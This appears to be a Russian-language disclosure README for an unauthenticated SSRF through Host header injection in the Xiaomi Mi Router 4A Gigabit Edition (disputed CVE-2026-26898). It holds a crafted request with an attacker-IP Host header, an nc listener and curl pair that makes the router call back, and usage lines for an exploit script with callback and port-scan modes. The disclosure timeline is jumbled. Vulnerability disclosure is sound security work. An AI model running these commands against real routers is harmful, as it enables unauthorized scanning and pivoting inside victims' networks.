
Неавторизованный SSRF в Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) через Host Header Injection — CVE-2026-26898
Уязвимость подделки серверного запроса (SSRF) существует в маршрутизаторе Xiaomi Mi Router 4A Gigabit Edition. Веб-интерфейс маршрутизатора не проверяет HTTP-заголовок Host, что позволяет неавторизованному злоумышленнику заставить маршрутизатор устанавливать произвольные исходящие TCP-соединения.
| Поле | Значение |
|---|---|
| Устройство | Xiaomi Mi Router 4A Gigabit Edition |
| Прошивка | 3.0.24 (International) |
| CVE | CVE-2026-26898 (оспаривается — см. статус раскрытия ниже) |
| CWE | CWE-918 (Server-Side Request Forgery) |
| CVSS 3.1 | 8.6 (Высокий) — оценка исследователя; вендор оспаривает серьезность |
Статус: Оспаривается вендором — этот отчет не был принят Xiaomi.
CVE-2026-26898 используется здесь только для отслеживания; учитывая спор с вендором, его следует рассматривать как оспариваемый / неподтвержденный, а не подтвержденный вендором.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Терминал 1: Запустить прослушивание
nc -l 4444
# Терминал 2: Отправить вредоносный запрос
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| Файл | Описание |
|---|---|
xiaomi_ssrf_exploit.py | Полный эксплойт с несколькими режимами |
# Проверить наличие уязвимости
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Режим обратного вызова
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Сканер портов
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| Дата | Событие |
|---|---|
| 2026-01-15 | Уязвимость обнаружена; разработано подтверждение концепции |
| 2026-01-16 | Сообщено в Xiaomi через HackerOne (#3513458) |
| 2026-01-23 |
Этот эксплойт предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace
| Xiaomi закрыла отчет как Информативный (низкий риск, не будет исправлять) |
| 2026-06-03 | Опубликована публичная рекомендация (этот репозиторий) — оспаривается вендором, не исправлено |